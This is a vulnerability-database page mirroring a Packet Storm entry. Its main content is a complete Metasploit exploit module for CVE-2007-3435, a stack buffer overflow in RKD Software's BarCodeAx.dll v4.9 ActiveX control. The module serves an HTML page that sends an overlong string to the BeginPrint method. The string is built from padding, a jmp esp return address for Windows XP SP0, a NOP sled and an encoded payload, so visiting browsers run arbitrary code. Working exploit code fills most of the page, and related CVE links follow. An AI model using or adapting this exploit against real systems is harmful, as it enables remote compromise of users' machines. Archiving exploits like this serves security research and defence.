Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPatrickPACKETSTORM:86297
HistoryFeb 15, 2010 - 12:00 a.m.

RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow

2010-02-1500:00:00
patrick
packetstormsecurity.com
23

0.947 High

EPSS

Percentile

99.3%

JSON
`##  
# $Id: barcode_ax49.rb 8466 2010-02-12 18:06:49Z patrickw $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in RKD Software Barcode Application  
ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint  
method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'Trancek <trancek[at]yashira.org>', 'patrick' ],   
'Version' => '$Revision: 8466 $',  
'References' =>  
[  
[ 'URL', 'http://www.milw0rm.com/exploits/4094' ],  
[ 'OSVDB', '37482' ],  
[ 'BID', '24596' ],  
[ 'CVE', '2007-3435' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x0a\x0d\x20\'\"%<>@=,.\#$&()\\/",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll patrickw xpsp0  
],  
'DisclosureDate' => 'Jun 22 2007',  
'DefaultTarget' => 0))  
end  
  
def autofilter  
false  
end  
  
def check_dependencies  
use_zlib  
end  
  
def on_request_uri(cli, request)  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Randomize some things  
vname = rand_text_alpha(rand(100) + 1)  
  
buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded  
  
# Build out the message  
content = %Q|  
<html>  
<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='#{vname}'></object>  
<script language='javascript'>  
#{vname}.BeginPrint("#{buff}");  
</script>  
</html>  
|  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
  
# Handle the payload  
handler(cli)  
end  
  
end  
`

Related

cve 1
checkpoint_advisories 1
cvelist 1
prion 1
nvd 1
cve
cve
CVE-2007-3435
2007-06-27 00:30:00
checkpoint_advisories
checkpoint_advisories
RKD Software ActiveX Control Remote Stack Buffer Overflow (CVE-2007-3435)
2011-12-27 00:00:00
cvelist
cvelist
CVE-2007-3435
2007-06-27 00:00:00
prion
prion
Stack overflow
2007-06-27 00:30:00
nvd
nvd
CVE-2007-3435
2007-06-27 00:30:00

0.947 High

EPSS

Percentile

99.3%

JSON
Related for PACKETSTORM:86297
cve1checkpoint_advisories1cvelist1prion1nvd1